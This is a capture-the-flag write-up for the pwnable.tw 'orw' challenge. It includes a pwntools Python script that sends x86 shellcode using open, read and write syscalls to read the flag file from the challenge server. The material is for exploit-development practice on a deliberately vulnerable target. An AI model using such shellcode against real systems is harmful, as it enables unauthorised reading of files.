[pwnable.tw] orw writeup

Challenge

---

Solving

running binary :

and part of main disassembly :

Binary reads our payload and store it at the address 0x8048370, then it runs the code there.

As the problem description says, maybe we should make a shellcode only with open, read, write syscall.

Here is my python script

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

#!/usr/bin/env python # pwnable.tw orw   from pwn import *   debug = 0   def exploit():     shellcode = ''     shellcode += asm('mov eax, 0x5')        # syscall : open     shellcode += asm('mov ebx, 0x804a09c')  # filename     shellcode += asm('mov ecx, 0x0')        # flags     shellcode += asm('mov edx, 0x804a0ab')  # mode     shellcode += asm('int 0x80')     shellcode += asm('mov ebx, eax')        # fd     shellcode += asm('mov eax, 0x3')        # syscall : read     shellcode += asm('mov ecx, 0x804a100')  # buf     shellcode += asm('mov edx, 0x64')       # count     shellcode += asm('int 0x80')     shellcode += asm('mov edx, eax')        # count     shellcode += asm('mov eax, 0x4')        # syscall : write     shellcode += asm('mov ebx, 0x1')        # fd     shellcode += asm('mov ecx, 0x804a100')  # buf     shellcode += asm('int 0x80')     shellcode += '/home/orw/flag\x00'     shellcode += 'r\x00'     s.send(shellcode)   if __name__ == '__main__':     if debug:         s = process('./orw')         pause()     else:         s = remote('chall.pwnable.tw', 10001)       exploit()     s.interactive()     s.close()

---

FL4G